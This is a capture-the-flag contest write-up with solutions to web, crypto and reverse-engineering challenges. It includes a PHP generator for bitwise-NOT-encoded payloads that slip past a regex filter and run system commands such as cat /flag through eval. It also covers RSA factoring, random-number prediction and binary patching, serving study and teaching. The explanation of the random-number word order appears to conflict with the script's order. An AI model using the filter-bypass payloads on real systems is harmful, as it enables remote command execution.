
6.4 Campus Contest Writeup

2021-06-06 13:32:12  Views: 230  Source: Internet

Tags: %# v0 v1 flag 6.4 value wp print 校赛


Campus Contest


I'm happy to have placed, and I still need to keep working. Unfortunately I did not solve the misc problems; I need to spend more time on them.

Web

入门 (Intro)

Press F12 to view the source and find the flag in the Network tab.

shell & shell_revenge

Both problems have the same solution. Looking at the PHP code, a regular expression filters out many characters. After some reading I learned that bitwise NOT (~) encoding does not trigger the regex; this is an original problem from ctfshow. The following PHP code generates the payload:

<?php
// Read the function name and its argument from stdin and strip the newline.
fwrite(STDOUT, '[+]your function: ');
$system = str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
fwrite(STDOUT, '[+]your command: ');
$command = str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
// Bitwise NOT every byte and percent-encode it; the target's eval undoes the ~.
echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';
?>

Run it from the command line: first enter system, then ls / as the command, and pass the output to eval; the page echoes flag home. Then enter cat /flag, pass it to eval again, and the flag is obtained.
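The reason a character blocklist misses the NOT-encoded payload, and what a stricter check looks like, as an added illustration that is not part of the original writeup. The challenge's real regex is not reproduced in the writeup, so BLOCKLIST below is an assumed stand-in; the allowlist is the defender's alternative (the real fix is not passing user input to eval at all).

```python
import re

# Assumed stand-in for the challenge's blocklist: the writeup only says it
# filtered "many characters", so this pattern is illustrative, not the real one.
BLOCKLIST = re.compile(rb"[a-zA-Z_]")

# Defender's alternative: an allowlist of the bytes a harmless expression needs.
# Anything outside printable ASCII, including every inverted byte, is rejected.
ALLOWLIST = re.compile(rb"[0-9+\-*/(). ]*")


def php_bitwise_not(s):
    """PHP's ~ on a string inverts every byte; applying it twice restores the input."""
    return bytes(b ^ 0xFF for b in s)


def weak_filter_allows(payload):
    """A blocklist on letters never matches once every byte is >= 0x80."""
    return BLOCKLIST.search(payload) is None


def strict_filter_allows(payload):
    """An allowlist only accepts the bytes explicitly permitted."""
    return ALLOWLIST.fullmatch(payload) is not None


def all_high_bytes(payload):
    """True when every byte has the top bit set, i.e. no ASCII letter survives."""
    return all(b >= 0x80 for b in payload)
```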

Crypto

贝斯手 (Bassist)

The title hints at the base family. Decoding with base64, base32, long_to_bytes (hex to bytes), base85 and base58 in that order gives the flag.

from Crypto.Util.number import *
from base64 import *
import base58   # third-party package: pip install base58

cipher = 'R1EzVElOQlRHSTNVSU5aVUdRNERNTlpWR0UyREVOS0dHWTJES01aVUlZMkRHTkJSR1JCVE9OUlhHNDNFSU5CWUdSRERNUUpXR00yVElOQlNHUTNUTU1aV0dBMkRPTkJSR1laVE9OSldHQTNES01SV0dZMkRLTVJXSU0zRE9OSlFHVTRETVJCVUdRWlVHTVpVR1VaVE9SQlhJUTJETz09PQ=='

res = b64decode(cipher)               # layer 1: base64
res = b32decode(res)                  # layer 2: base32, yields a hex string
res = long_to_bytes(int(res, 16))     # layer 3: hex -> integer -> bytes
res = b85decode(res)                  # layer 4: base85
res = base58.b58decode(res)           # layer 5: base58
print(res)

flag:scuctf{M4ny_k1nds_0f_13a5e!}

crypto1

Random-number prediction; a ready-made library (randcrack) exists for this. The 312 64-bit numbers must be split into 624 32-bit numbers. Because the 32-bit output order is abcd while the 64-bit order is badc, the halves have to be taken in reverse; note that each number must also be zero-padded to 64 bits. Script:

from Crypto.Util.number import *
from randcrack import RandCrack
from Crypto.Cipher import AES

rc = RandCrack()
with open("./test", 'rb') as f:
    # 312 64-bit outputs -> 624 32-bit words, the number of outputs MT19937 needs
    for i in range(312):
        a = int(f.readline())
        a = bin(a)[2:].zfill(64)        # pad to the full 64 bits
        c = int('0b' + a[:32], 2)       # high 32 bits
        b = int('0b' + a[32:], 2)       # low 32 bits
        rc.submit(c)
        rc.submit(b)

res = rc.predict_getrandbits(128)
key1 = long_to_bytes(res)

res = open('./out', 'rb').read()
aes1 = AES.new(key1, AES.MODE_CBC, b"\x00"*16)
flag = aes1.decrypt(res)
print(flag)

# key2 was left undefined in the original script; it is assumed here to be the
# next 128 predicted bits (a second candidate key).
key2 = long_to_bytes(rc.predict_getrandbits(128))
aes2 = AES.new(key2, AES.MODE_CBC, b"\x00"*16)
flag = aes2.decrypt(res)
print(flag)

flag:scuctf{af0sd_f8}
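How CPython assembles a 64-bit getrandbits() result from two 32-bit MT19937 outputs, and why the submission order matters, as an added check that is not part of the original writeup. It only uses the standard library; the split is verified against a second generator seeded identically, and the last function shows the CSPRNG the challenge should have used for its key.

```python
import random
import secrets

MASK32 = 0xFFFFFFFF


def split_64(value):
    """Split one getrandbits(64) result into the two 32-bit MT19937 outputs
    it was assembled from, in generation order. CPython fills the result from
    the least-significant word upward, so the low half is the first output
    and the high half is the second."""
    return value & MASK32, value >> 32


def check_word_order(seed, count=4):
    """Draw `count` 64-bit values from one seeded generator and 2*count
    32-bit values from an identically seeded one; the split 64-bit values
    (low half first) must reproduce the 32-bit stream exactly."""
    wide = random.Random(seed)
    narrow = random.Random(seed)
    from_wide = [w for v in (wide.getrandbits(64) for _ in range(count))
                 for w in split_64(v)]
    from_narrow = [narrow.getrandbits(32) for _ in range(2 * count)]
    return from_wide == from_narrow


def aes_key_from_os():
    """What a key should come from instead of random: the OS CSPRNG via
    secrets, whose output cannot be reconstructed from earlier outputs."""
    return secrets.token_bytes(16)
```

If check_word_order() holds for your Python build, the 64-bit values in a dump are "low word, high word" pairs and must be fed to the cracker in that order.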

crypto2

A simple Coppersmith problem.
p is 512 bits and x is 128 bits; set the leading element of x to 1. The resulting condition is that p_ is 1019 bits with the low 128 bits unknown, which the Coppersmith method solves directly. Multiplying the recovered p_ by 2^ex modulo n then gives the real p. Script:

'''sage
n = 85016144249518040150910227120120655178858680112497903474795846550337648959184474608344455198424753002209821827392389091448043545937173891641586356377876821641241033232828279439195610943286663032638048058568003136520988549470764306016674503217880123290623177055115638997384030786304744623796469032887028528817

e = 65537
c = 83724265903365973936178131138176403586796491037282811488797349096425411605088349291193550728134684573063610685342590513444340298881918101517014943046522979731970278182306111863948764449232289625176702192589838375986050458189860493609407060988207562417247647655585368569618561494059816502622854344519538215287

pbar = 4450463823628350893648746241337847373556196959762621885713665365237037340874488165755826348254697529157574566792939002187459776672801308978738078688091668148118673194644809701286264701999481650571431714684293423463355990167658855533422964048092514208406515703766237697665676941598677911363439038209842058509
kbits = 128

print("upper %d bits (of %d bits) is given" % (pbar.nbits()-kbits, pbar.nbits()))

PR.<x> = PolynomialRing(Zmod(n))
f = x + pbar

# small root x0 < 2^128 of f modulo a divisor of n of size at least n^0.5 (beta=0.5)
x0 = f.small_roots(X=2^kbits, beta=0.5)[0]
p = x0 + pbar
print(p)

'''
from Crypto.Util.number import *
import gmpy2

leak = 1145141920069   # challenge constant, not used below
n=   85016144249518040150910227120120655178858680112497903474795846550337648959184474608344455198424753002209821827392389091448043545937173891641586356377876821641241033232828279439195610943286663032638048058568003136520988549470764306016674503217880123290623177055115638997384030786304744623796469032887028528817
c=   83724265903365973936178131138176403586796491037282811488797349096425411605088349291193550728134684573063610685342590513444340298881918101517014943046522979731970278182306111863948764449232289625176702192589838375986050458189860493609407060988207562417247647655585368569618561494059816502622854344519538215287
pbar=4450463823628350893648746241337847373556196959762621885713665365237037340874488165755826348254697529157574566792939002187459776672801308978738078688091668148118673194644809701286264701999481650571431714684293423463355990167658855533422964048092514208406515703766237697665676941598677911363439038209842058509
ex = 384

p_=4450463823628350893648746241337847373556196959762621885713665365237037340874488165755826348254697529157574566792939002187459776672801308978738078688091668148118673194644809701286264701999481650571431714684293423463355990167658855533422964048092514208406515703766237697896644308153471350247313227602240058029
p = p_ * 2**ex % n          # shift back by 2^ex modulo n to get the real p
q = n // p
phi = (p-1)*(q-1)
d = gmpy2.invert(65537, phi)
m = gmpy2.powmod(c, d, n)
print(long_to_bytes(m))

flag:scuctf{f05fe93d159b398fe25f280d94241261}
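Why multiplying by 2^ex modulo n recovers p, and a gcd shortcut, as an added toy illustration that is not part of the original writeup. It assumes the relation implied by the script above (p_ * 2^ex ≡ p mod n, i.e. p_ is p times the inverse of 2^ex) and uses two small constructed primes in place of the 512-bit ones; pow() with a negative exponent needs Python 3.8+.

```python
from math import gcd

# Constructed toy instance standing in for the challenge's 512-bit primes.
P_TOY = 65537
Q_TOY = 65539
N_TOY = P_TOY * Q_TOY
EX_TOY = 8   # the writeup's shift is 384; any positive shift works the same way


def shift_prime(p, n, ex):
    """Model the value the Coppersmith step returns: p times the inverse of
    2**ex modulo n (assumed from the writeup's p = p_ * 2**ex % n).
    The result is still a multiple of p, just no longer 512 bits."""
    return p * pow(2, -ex, n) % n


def unshift_prime(p_, n, ex):
    """The writeup's final step: multiply back by 2**ex modulo n."""
    return p_ * pow(2, ex, n) % n


def prime_from_multiple(p_, n):
    """Shortcut: p_ is a multiple of p but not of q, so gcd(p_, n) is p."""
    return gcd(p_, n)


def is_factor(p, n):
    """Sanity check used before trusting a recovered prime."""
    return 1 < p < n and n % p == 0
```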

RE

ez_fps

A Unity game; opening it shows a shooter. Checking with DIE: PE64.

Drop Assembly-CSharp.dll from the Managed folder into dnSpy64 and the flag is immediately visible:

// Token: 0x0600003B RID: 59 RVA: 0x00003A20 File Offset: 0x00001C20
public static string TryGetFlag()
{
	if (Flag.score >= 100)
	{
		return "scuctf{AK47_b4d_PP_Bizon_g00d}";
	}
	return Flag.score.ToString();
}

pixel

SMC (self-modifying code).

The program reads the colour value of the pixel at screen position (401, 401) and uses it to perform SMC.

The common function prologue

push ebp
mov ebp, esp

serves as the clue: XOR the stored bytes with the expected prologue bytes to derive the colour value, after which the program prints the flag directly.

0x61^0x55 = 0x34
0x8b^0xbb = 0x30
0xec^0xdd = 0x31

So the colour value is:

313034h

Running with it gives:

scuctf{pixel!pixel!pixel!}
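The known-plaintext XOR key recovery from the prologue, written out as an added example that is not part of the original writeup. It assumes the stored bytes are XORed byte-wise with a repeating 3-byte key (the writeup's three XOR lines); the constructed function body after the prologue is made up for the round-trip check.

```python
# push ebp ; mov ebp, esp -- the standard x86 prologue used as known plaintext
PROLOGUE = bytes([0x55, 0x8B, 0xEC])

# First three bytes of the protected function as stored (from the writeup's XOR lines)
STORED_PROLOGUE = bytes([0x61, 0xBB, 0xDD])


def recover_xor_key(stored, known_plain):
    """Known-plaintext attack on a byte-wise XOR: key = stored ^ plain."""
    return bytes(s ^ k for s, k in zip(stored, known_plain))


def key_as_dword(key):
    """The 3-byte key read little-endian, i.e. the colour value the program expects."""
    return int.from_bytes(key, "little")


def xor_with_key(blob, key):
    """Apply a repeating XOR key over a code region (assumed repeating 3-byte key);
    encrypting and decrypting are the same operation."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(blob))


def looks_like_function_start(code):
    """Check that a decrypted region begins with the expected prologue."""
    return code[:len(PROLOGUE)] == PROLOGUE


# Constructed sample: prologue followed by a made-up "sub esp, 0x10"
SAMPLE_BODY = PROLOGUE + bytes([0x83, 0xEC, 0x10])
```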

rvm

A Ruby script implementing a nasty little virtual machine (surely adapted from CISCN).

# values dumped from the VM; not used by the decoder below
a = '''
20041
20161
20276
20334
20458
20514
20605
20798
20839
20984
21064
21163
21269
21314
21452
21586
21613
21778
21875
21987
22080
22165
22279
22369
22476
22502
22676
'''

b = [41,61,76,34,58,14,5,98,39,84,64,63,69,14,52,86,13,78,75,87,80,65,79,69,76,2,76]

c = [93,88,52,69,67,98,135,24,89,56,196,84,123,143,90,223,76,201,206,36,43,201,7,14,203,124,212]

# undo the VM's check: XOR the two tables, then subtract (index + 1) from each byte
d = [x ^ y for x, y in zip(b, c)]
e = [chr(v - i - 1) for i, v in enumerate(d)]

print(''.join(e))
# scuctf{ruby_1s_y0ur_fr13nd}

baby_maze

A maze challenge, but a somewhat complicated one: there are 100 maze functions, each stuffed with useless instruction sequences like

push rax
rdrand rax
pop rax

Without further ado, write a script to patch them out, then let angr do the rest.

The patch script:

#!/usr/bin/env python
# Replace every "push rax; rdrand rax; pop rax" (50 48 0F C7 F0 58) with six NOPs.
JUNK = bytes([0x50, 0x48, 0x0F, 0xC7, 0xF0, 0x58])
NOPS = b"\x90" * len(JUNK)

with open("baby_maze", "rb") as f:
    binary = bytearray(f.read())

i = binary.find(JUNK)
while i != -1:
    binary[i:i + len(JUNK)] = NOPS
    i = binary.find(JUNK, i + len(JUNK))

with open("baby_maze_altered", "wb") as ff:
    ff.write(bytes(binary))

And the angr script that solves all 100 mazes in one go:

import angr

# the patched binary written by the patch script above
p = angr.Project("baby_maze_altered")

ff = open("flag.txt", "w")

# each maze function is 0x16 bytes apart; start after its prologue and
# look for the address reached when the maze is solved
for i in range(0, 100):
    state = p.factory.blank_state(addr=0xa6aac + 0x400000 + i*0x16)

    #state.stack_push(state.regs.rbp)
    #state.regs.rbp = state.regs.rsp

    sm = p.factory.simgr(state)
    sm.explore(find=0xa6ace + 0x400000 + i*0x16)

    if sm.found:
        fs = sm.found[0]
        print(fs.posix.dumps(0))            # stdin that reaches the target
        ff.write(fs.posix.dumps(0).decode())
        #print(fs.posix.dumps(1))
    else:
        print("no")

ff.close()

Source: https://blog.csdn.net/shikaku_/article/details/117622087
